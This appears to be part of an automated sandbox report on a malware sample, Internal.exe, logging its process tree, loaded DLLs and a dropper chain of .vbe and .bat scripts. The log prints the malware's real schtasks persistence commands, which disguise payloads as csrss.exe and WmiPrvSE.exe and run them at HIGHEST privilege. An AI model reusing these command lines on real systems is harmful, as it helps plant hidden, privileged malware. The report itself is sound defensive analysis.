                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\cQVCqZDT.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_03
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-lbrp3oxXXiUX78hSSIVX
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\AppData\Local\Temp\yoszi2ziJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: sfxname1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: sfxstime1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: STARTDLG1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: xzT1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                    Source: Internal.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\Internal.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: lsdR7GeA5x.16.dr, QwjUqFq2UZ.16.dr, OGRf5Js3co.16.dr, N8x6rZkZOD.16.dr, ieM8OO0J4Y.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: Internal.exeVirustotal: Detection: 68%
                                    Source: Internal.exeReversingLabs: Detection: 76%
                                    Source: C:\Users\user\Desktop\Internal.exeFile read: C:\Users\user\Desktop\Internal.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\Internal.exe "C:\Users\user\Desktop\Internal.exe"
                                    Source: C:\Users\user\Desktop\Internal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Blockcomcrt\AgentMonitor.exe "C:\Blockcomcrt/AgentMonitor.exe"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"
                                    Source: unknownProcess created: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 7 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 10 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentMonitor" /sc ONLOGON /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 12 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\Blockcomcrt\AgentMonitor.exe C:\Blockcomcrt\AgentMonitor.exe
                                    Source: unknownProcess created: C:\Blockcomcrt\AgentMonitor.exe C:\Blockcomcrt\AgentMonitor.exe
                                    Source: unknownProcess created: C:\Recovery\csrss.exe C:\Recovery\csrss.exe
                                    Source: unknownProcess created: C:\Recovery\csrss.exe C:\Recovery\csrss.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Blockcomcrt\WmiPrvSE.exe "C:\Blockcomcrt\WmiPrvSE.exe"
                                    Source: C:\Users\user\Desktop\Internal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Blockcomcrt\AgentMonitor.exe "C:\Blockcomcrt/AgentMonitor.exe"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Blockcomcrt\WmiPrvSE.exe "C:\Blockcomcrt\WmiPrvSE.exe"
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: shfolder.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
